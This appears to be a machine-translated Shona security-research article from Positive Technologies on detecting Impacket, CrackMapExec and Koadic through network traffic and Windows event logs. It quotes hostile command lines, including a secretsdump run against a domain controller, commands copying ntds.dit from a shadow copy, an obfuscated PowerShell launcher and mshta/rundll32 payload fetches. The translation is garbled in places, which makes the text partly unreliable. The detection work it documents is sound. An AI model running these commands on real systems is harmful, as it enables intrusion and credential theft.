Huwandu hwekurwiswa muchikamu chemakambani huri kukura gore rega rega: semuenzaniso kupfuura muna 2016, uye pakupera kwa2018 - kupfuura munguva yapfuura. Kusanganisira idzo uko chishandiso chikuru chekushanda iWindows inoshanda sisitimu. Muna 2017-2018, iyo APT Dragonfly, APT28, akaita kurwisa hurumende nemasangano emauto muEurope, North America neSaudi Arabia. Uye isu takashandisa zvishandiso zvitatu zveizvi - , ΠΈ . Yavo kodhi kodhi yakavhurika uye inowanikwa paGitHub.
Zvakakosha kucherechedza kuti maturusi aya haashandiswe kutanga kupinda, asi kugadzira kurwisa mukati mezvivakwa. Vapambi vanovashandisa pamatanho akasiyana ekurwisa zvichitevera kupinda kweiyo perimeter. Izvi, nenzira, zvakaoma kuona uye kazhinji chete nerubatsiro rwe teknolojia kana midziyo inobvumira . Zvishandiso zvinopa mabasa akasiyana-siyana, kubva pakufambisa mafaira kuenda kukubatana neregistry uye kuita mirairo pamushini uri kure. Takaita ongororo yezvishandiso izvi kuti tione basa ravo renetiweki.
Zvataifanira kuita:
- Nzwisisa kuti maturusi ekubira anoshanda sei. Tsvaga izvo vanorwisa vanofanirwa kushandisa uye kuti ndeapi matekinoroji avanogona kushandisa.
- Tsvaga izvo zvisingaonekwe neruzivo rwekuchengetedza maturusi mumatanho ekutanga ekurwisa. Chikamu chekucherekedza chinogona kusvetuka, kungave nekuti munhu anorwisa ari mukati mekurwisa, kana nekuti anorwisa ari kushandisa gomba mune zvivakwa zvanga zvisati zvazivikanwa. Zvinova zvinogoneka kudzorera ketani yose yezviito zvake, saka chido chekuona kumwe kufamba.
- Bvisa maitiro enhema kubva kune maturusi ekuona ekupinda. Hatifanire kukanganwa kuti kana zvimwe zviito zvakaonekwa pahwaro hwekuziva chete, zvikanganiso zvinowanzoitika. Kazhinji mune zvivakwa kune nhamba yakakwana yenzira, isingazivikanwe kubva kune zviri pamutemo pakuona kwekutanga, kuwana chero ruzivo.
Zvishandiso izvi zvinopei vanorwisa? Kana iyi iri Impacket, saka vanorwisa vanogashira raibhurari yakakura yemamodules inogona kushandiswa pamatanho akasiyana ekurwiswa kunotevera mushure mekutyora perimeter. Zvishandiso zvakawanda zvinoshandisa Impacket modules mukati - semuenzaniso, Metasploit. Iyo ine dcomexec uye wmiexec yekuremote command execution, secretsdump yekuwana maakaundi kubva mundangariro anowedzerwa kubva kuImpacket. Nekuda kweizvozvo, kutariswa kwakaringana kwebasa reraibhurari yakadaro kunovimbisa kuwanikwa kwezvinobvamo.
Hazvina tsanga kuti vagadziri vakanyora "Powered by Impacket" nezve CrackMapExec (kana kungoti CME). Uye zvakare, CME ine yakagadzirira-yakagadzirwa mashandiro ezviitiko zvakakurumbira: Mimikatz yekuwana mapassword kana hashi yavo, kuita kweMeterpreter kana Empire mumiriri wekuuraya kure, uye Bloodhound pabhodhi.
Chishandiso chechitatu chatakasarudza chaive Koadic. Ichangoburwa, yakaratidzwa kumusangano wepasi rose wehacker DEFCON 25 muna 2017 uye inosiyaniswa neyakajairwa nzira: inoshanda kuburikidza neHTTP, Java Script uye Microsoft Visual Basic Script (VBS). Iyi nzira inonzi kurarama kubva panyika: chishandiso chinoshandisa seti yekutsamira uye maraibhurari akavakirwa muWindows. Vagadziri vanoidaidza kuti COM Command & Control, kana C3.
IMPACKET
Kuita kweImpacket kwakakura kwazvo, kubva pakuziva zvakare mukati meAD uye kuunganidza data kubva mukati meMS SQL maseva, kune matekiniki ekuwana magwaro: iyi iSMB relay kurwisa, uye kuwana iyo ntds.dit faira rine hashes yemapassword emushandisi kubva kune domain controller. Impacket zvakare inoita mirairo iri kure uchishandisa nzira ina dzakasiyana: WMI, Windows Scheduler Management Service, DCOM, uye SMB, uye inoda magwaro kuti adaro.
Secretsdump
Ngatitarisei pane secretsdump. Iyi module inogona kunanga ese ari maviri emushandisi michina uye domain controllers. Inogona kushandiswa kuwana makopi enzvimbo dzekurangarira LSA, SAM, SECURITY, NTDS.dit, saka inogona kuoneka pamatanho akasiyana ekurwisa. Nhanho yekutanga mukushanda kwemodule ndeyechokwadi kuburikidza neSMB, iyo inoda kana password yemushandisi kana hashi yayo kuti iite otomatiki Pass the Hash kurwisa. Tevere kunouya chikumbiro chekuvhura mukana weSevhisi Kudzora Maneja (SCM) uye kuwana mukana wekunyoresa kuburikidza ne winreg protocol, uchishandisa iyo anorwisa anogona kuziva iyo data yemapazi ekufarira uye kuwana mhinduro kuburikidza neSMB.
Mumufananidzo. 1 tinoona sei chaizvo kana uchishandisa iyo winreg protocol, kuwana kunowanikwa uchishandisa kiyi yekunyoresa ine LSA. Kuti uite izvi, shandisa iyo DCERPC kuraira neopcode 15 - OpenKey.
Mupunga. 1. Kuvhura kiyi registry uchishandisa winreg protocol
Tevere, kana kuwana kiyi kwawanikwa, kukosha kunochengetwa neSaveKey kuraira neopcode 20. Impacket inoita izvi nenzira chaiyo. Inochengetedza kukosha kufaira rine zita retambo yemavara masere asina kurongeka akawedzerwa ne .tmp. Pamusoro pezvo, kumwe kukwidzwa kwefaira iri kunoitika kuburikidza neSMB kubva kuSystem8 dhairekitori (Fig. 32).
Mupunga. 2. Scheme yekuwana kiyi ye registry kubva pamushini uri kure
Zvinoitika kuti chiitiko chakadaro pane network chinogona kuwonekwa nemibvunzo kune mamwe matavi eregistry uchishandisa iyo winreg protocol, mazita chaiwo, mirairo uye kurongeka kwavo.
Iyi module zvakare inosiya zvitendwa muWindows chiitiko log, zvichiita kuti zvive nyore kuona. Semuenzaniso, semugumisiro wekuita murairo
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCMuWindows Server 2016 log tichaona zvinotevera kutevedzana kwezviitiko:
1. 4624 - kure Logon.
2. 5145 - kutarisa kodzero dzekuwana kune winreg remote service.
3. 5145 - kutarisa kodzero dzekuwana faira muSystem32 dhairekitori. Iro faira rine zita risingaite rataurwa pamusoro apa.
4. 4688 - kugadzira cmd.exe maitiro anotanga vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - kugadzira maitiro nemurairo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - kugadzira maitiro nemurairo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - kugadzira maitiro nemurairo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Kufanana nemidziyo yakawanda-yekushandisa-yekushandisa, Impacket ine mamodule ekuraira kure kure. Isu tichatarisa pane smbexec, iyo inopa inopindirana yekuraira goko pamushini uri kure. Iyi module inodawo huchokwadi kuburikidza neSMB, ingave nepassword kana password hashi. Mumufananidzo. Mumufananidzo 3 tinoona muenzaniso wekuti chimbo chakadaro chinoshanda sei, munyaya iyi ndiyo mutevedzeri wemunzvimbo.
Mupunga. 3. Interactive smbexec console
Nhanho yekutanga ye smbexec mushure mechokwadi ndeyekuvhura iyo SCM neiyo OpenSCManagerW murairo (15). Mubvunzo wakakosha: iyo MachineName munda ndeye DUMMY.
Mupunga. 4. Chikumbiro chekuvhura Service Control Manager
Tevere, sevhisi inogadzirwa uchishandisa iyo CreateServiceW command (12). Panyaya ye smbexec, isu tinogona kuona imwechete yekuraira logic nguva dzese. Mumufananidzo. 5 yegirini inoratidza isingachinjiki yemirairo paramita, yero inoratidza izvo munhu anorwisa anogona kuchinja. Zviri nyore kuona kuti zita refaira rinoitwa, dhairekitori rayo uye faira rekubuda rinogona kuchinjwa, asi zvimwe zvakanyanya kuoma kuchinja pasina kukanganisa logic yeImpacket module.
Mupunga. 5. Chikumbiro chekugadzira sevhisi uchishandisa Service Control Manager
Smbexec zvakare inosiya maratidziro akajeka muWindows chiitiko log. MuWindows Server 2016 logi yeiyo inopindirana yekuraira shell ine ipconfig command, isu tichaona inotevera kiyi kutevedzana kwezviitiko:
1. 4697 - kuisirwa sevhisi pamushini weakabatwa:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - kusikwa kweiyo cmd.exe maitiro ane nharo kubva pachibodzwa chekutanga.
3. 5145 - kutarisa kodzero dzekuwana kune __output faira muC $ dhairekitori.
4. 4697 - kuiswa kwesevhisi pamushini weakabatwa.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - kusikwa kweiyo cmd.exe maitiro ane nharo kubva pachibodzwa chekutanga.
6. 5145 - kutarisa kodzero dzekuwana kune __output faira muC $ dhairekitori.
Impacket ndiyo hwaro hwekuvandudzwa kwemidziyo yekurwisa. Inotsigira anenge ese maprotocol muWindows infrastructure uye panguva imwe chete ine maitiro ayo. Heano chaiwo Winreg zvikumbiro, uye kushandiswa kweSCM API ine hunhu hwekuraira kuumbwa, uye faira rezita fomati, uye SMB share SYSTEM32.
CRACKMAPEXEC
Chishandiso cheCME chakagadzirwa kuti chiite otomatiki zviito izvo munhu anorwisa anofanira kuita kuti afambire mberi mukati metiweki. Inokubvumira kushanda pamwe chete neanozivikanwa Empire agent uye Meterpreter. Kuita mirairo pachivande, CME inogona kuvakanganisa. Uchishandisa Bloodhound (yakasiyana reconnaissance chishandiso), anorwisa anogona otomatiki kutsvaga kweanoshanda domain administrator chikamu.
bloodhound
Bloodhound, sechishandiso chakamira, inobvumira kutarisisa kwepamberi mukati metiweki. Iyo inounganidza data nezve vashandisi, michina, mapoka, zvikamu uye inopihwa sePowerShell script kana binary faira. LDAP kana SMB-based protocols anoshandiswa kuunganidza ruzivo. Iyo CME yekubatanidza module inobvumira Bloodhound kutorwa kumuchina weakabatwa, kumhanya uye kugashira iyo data yakaunganidzwa mushure mekuurayiwa, nekudaro kuita otomatiki muhurongwa uye kuita kuti vasaonekwe. Iyo Bloodhound graphical shell inopa iyo yakaunganidzwa data muchimiro chegirafu, iyo inokutendera iwe kuti uwane ipfupi nzira kubva kumushini weanorwisa kuenda kune domain administrator.
Mupunga. 6. Bloodhound Interface
Kumhanya pamushini weakabatwa, iyo module inogadzira basa uchishandisa ATSVC uye SMB. ATSVC chimiro chekushanda neWindows Task Scheduler. CME inoshandisa yayo NetrJobAdd(1) basa kugadzira mabasa pamusoro petiweki. Muenzaniso wezvinotumirwa neCME module inoratidzwa muFig. 7: Iyi ndiyo cmd.exe yekuraira kufona uye obfuscated kodhi muchimiro chenharo muXML fomati.
Fig.7. Kugadzira basa kuburikidza neCME
Mushure mekunge basa raendeswa kuti riurawe, muchina wemurwi unotanga Bloodhound pachayo, uye izvi zvinogona kuoneka mumotokari. Iyo module inoratidzirwa neLDAP mibvunzo yekuwana akajairwa mapoka, runyoro rwemichina yese nevashandisi vari mudura, uye kuwana ruzivo nezve anoshanda anoshanda masesheni kuburikidza nechikumbiro cheSRVSVC NetSessEnum.
Mupunga. 8. Kuwana runyoro rwezvikamu zvinoshanda kuburikidza neSMB
Uye zvakare, kuvhura Bloodhound pamushini wemunhu akabatwa neauditing inogoneswa inoperekedzwa nechiitiko chine ID 4688 (maitiro ekugadzira) uye zita rekuita. Β«C:WindowsSystem32cmd.exeΒ». Chinocherechedzwa nezvayo ndiwo mapokana emutsara wekuraira:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "Enum_avproducts
Iyo enum_avproducts module inonakidza kwazvo kubva pakuona kwekuita uye kuita. WMI inobvumidza iwe kushandisa iyo WQL yemubvunzo mutauro kutora data kubva kwakasiyana maWindows zvinhu, zvinova ndizvo zvinonyanya kushandiswa neCME module. Iyo inoburitsa mibvunzo kuAntiSpywareProduct uye AntiΠirusProduct makirasi nezve maturusi ekudzivirira akaiswa pamushini weanobatwa. Kuti uwane iyo data inodiwa, iyo module inobatana neiyo rootSecurityCenter2 namespace, yobva yagadzira mubvunzo weWQL uye inogamuchira mhinduro. Mumufananidzo. Mufananidzo 9 unoratidza zviri mukati mezvikumbiro zvakadaro nemhinduro. Mumuenzaniso wedu, Windows Defender yakawanikwa.
Mupunga. 9. Network basa re enum_avproducts module
Kazhinji, WMI auditing (Trace WMI-Activity), mune zviitiko zvaunogona kuwana ruzivo runobatsira pamusoro pemibvunzo yeWQL, inogona kuvharwa. Asi kana ikagoneswa, zvino kana iyo enum_avproducts script ichiitwa, chiitiko chine ID 11 chichachengetwa. Chinenge chine zita remushandisi atumira chikumbiro uye zita mumudziyoSecurityCenter2 namespace.
Imwe neimwe yemamodule eCME yaive neyayo zvigadzirwa, ingave yakananga mibvunzo yeWQL kana kugadzirwa kwerimwe rudzi rwebasa muhurongwa hwebasa rine obfuscation uye Bloodhound-chaiyo chiitiko muLDAP neSMB.
KOADIC
Chinhu chakasiyana cheKoadic kushandiswa kweJavaScript neVBScript vaturikiri vakavakirwa muWindows. Mupfungwa iyi, inotevera kurarama kubva pasimba maitiro - ndiko kuti, haina zvekunze zvinotsamira uye inoshandisa yakajairwa Windows maturusi. Ichi chishandiso cheKuraira & Kudzora kwakazara (CnC), kubva mushure mekutapukirwa "implant" yakaiswa pamushini, ichibvumira kuti idzorwe. Muchina wakadaro, muKoadic terminology, unonzi "zombie." Kana paine ropafadzo dzisina kukwana dzekushanda kwakazara kudivi remunhu anenge abatwa, Koadic inokwanisa kuvasimudza vachishandisa User Account Control bypass (UAC bypass) matekiniki.
Mupunga. 10. Koadic Shell
Munhu akabatwa anofanira kutanga kutaurirana neCommand & Control server. Kuti aite izvi, anofanirwa kubata URI yakambogadzirirwa uye agamuchire mukuru weKoadic muviri achishandisa imwe yevatambi. Mumufananidzo. Mufananidzo 11 unoratidza muenzaniso wemshta stager.
Mupunga. 11. Kutanga musangano neCnC server
Zvichienderana nemhinduro yemhinduro WS, zvinobuda pachena kuti kuuraya kunoitika kuburikidza neWScript.Shell, uye mavara anoti STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ane ruzivo rwakakosha pamusoro pemaparamita echikamu chazvino. Iyi ndiyo yekutanga yekukumbira-mhinduro mbiri muHTTP yekubatanidza ine CnC server. Zvikumbiro zvinotevera zvine chekuita nekushanda kweanonzi ma modules (implants). Ese maKoadic modules anoshanda chete nechikamu chinoshanda neCnC.
Mimikatz
Kungofanana neCME inoshanda neBloodhound, Koadic inoshanda naMimikatz sechirongwa chakasiyana uye ine nzira dzakawanda dzekuchivhura. Pazasi pane chikumbiro-mhinduro mbiri yekurodha iyo Mimikatz implant.
Mupunga. 12. Tumira Mimikatz kuKoadic
Iwe unogona kuona kuti iyo URI fomati mukukumbira yachinja sei. Ikozvino ine kukosha kweiyo csrf kusiyanisa, iyo ine basa kune yakasarudzwa module. Usateerera zita rake; Tese tinoziva kuti CSRF inowanzonzwisiswa zvakasiyana. Mhinduro yacho yaiva imwechete huru yeKoadic, iyo code yakabatana neMimikatz yakawedzerwa. Iyo yakakura chaizvo, saka ngatitarisei pane zvakakosha. Pano tine raibhurari yeMimikatz yakavharidzirwa mu base64, serialized .NET kirasi inozoipinza, uye nharo dzokutanga Mimikatz. Mhedzisiro yekuuraya inofambiswa pane network mune yakajeka mavara.
Mupunga. 13. Mhedzisiro yekumhanyisa Mimikatz pamushini uri kure
Exec_cmd
Koadic zvakare ine ma module anogona kuita mirairo kure. Pano tichaona iyo yakafanana URI chizvarwa nzira uye yakajairika sid uye csrf akasiyana. Panyaya ye exec_cmd module, kodhi inowedzerwa kumuviri unokwanisa kuita mirairo yegomba. Pazasi panoratidzwa kodhi yakadaro iri muHTTP mhinduro yeCnC server.
Mupunga. 14. Kudyara kodhi exec_cmd
Iyo GAWTUUGCFI shanduko ine yakajairika WS hunhu inodiwa pakuita kodhi. Nekubatsira kwayo, iyo implant inodana shell, kugadzirisa matavi maviri ekodhi - shell.exec nekudzoka kwekubuda kwe data stream uye shell.run pasina kudzoka.
Koadic haisi chishandiso chakajairwa, asi ine zvayo zvigadzirwa iyo inogona kuwanikwa mune zviri pamutemo traffic:
- kuumbwa kwakakosha kweHTTP zvikumbiro,
- uchishandisa winHttpRequests API,
- kugadzira chinhu cheWScript.Shell kuburikidza neActiveXObject,
- hombe executable muviri.
Kubatana kwekutanga kunotangwa ne stager, saka zvinokwanisika kuona basa rayo kuburikidza neWindows zviitiko. Kune mshta, ichi chiitiko 4688, chinoratidza kusikwa kwemaitiro ane hunhu hwekutanga:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Ipo Koadic ichimhanya, unogona kuona zvimwe 4688 zviitiko zvine hunhu hunonyatso ratidza:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1zvakawanikwa
Kurarama nemaitiro epasi kuri kuita mukurumbira pakati pematsotsi. Ivo vanoshandisa maturusi uye michina yakavakirwa muWindows kune zvavanoda. Tiri kuona zvishandiso zvakakurumbira Koadic, CrackMapExec uye Impacket ichitevera iyi musimboti ichiwedzera kuoneka mumishumo yeAPT. Huwandu hweforogo paGitHub yezvishandiso izvi zviri kukura zvakare, uye zvitsva zviri kuoneka (patova nezviuru zvadzo izvozvi). Maitiro ari kuita mukurumbira nekuda kwekureruka kwawo: vanorwisa havadi zvechitatu-bato maturusi; ivo vatove pamichina yevakabatwa uye vanovabatsira kudarika matanho ekuchengetedza. Isu tinotarisa pakudzidza kutaurirana kwenetiweki: chishandiso chega chega chakatsanangurwa pamusoro chinosiya zvikwambo zvaro mumambure traffic; kunyatsodzidza kwavari kwakatibvumira kudzidzisa chigadzirwa chedu vaone, izvo zvinozobatsira kuferefeta ketani yese yezviitiko zvecyber zvinosanganisira ivo.
Authors:
- Anton Tyurin, Musoro weDhipatimendi reNyanzvi, PT Nyanzvi Chengetedzo Center, Positive Technologies.
- Egor Podmokov, nyanzvi, PT Nyanzvi Chengetedzo Center, Positive Technologies
Source: www.habr.com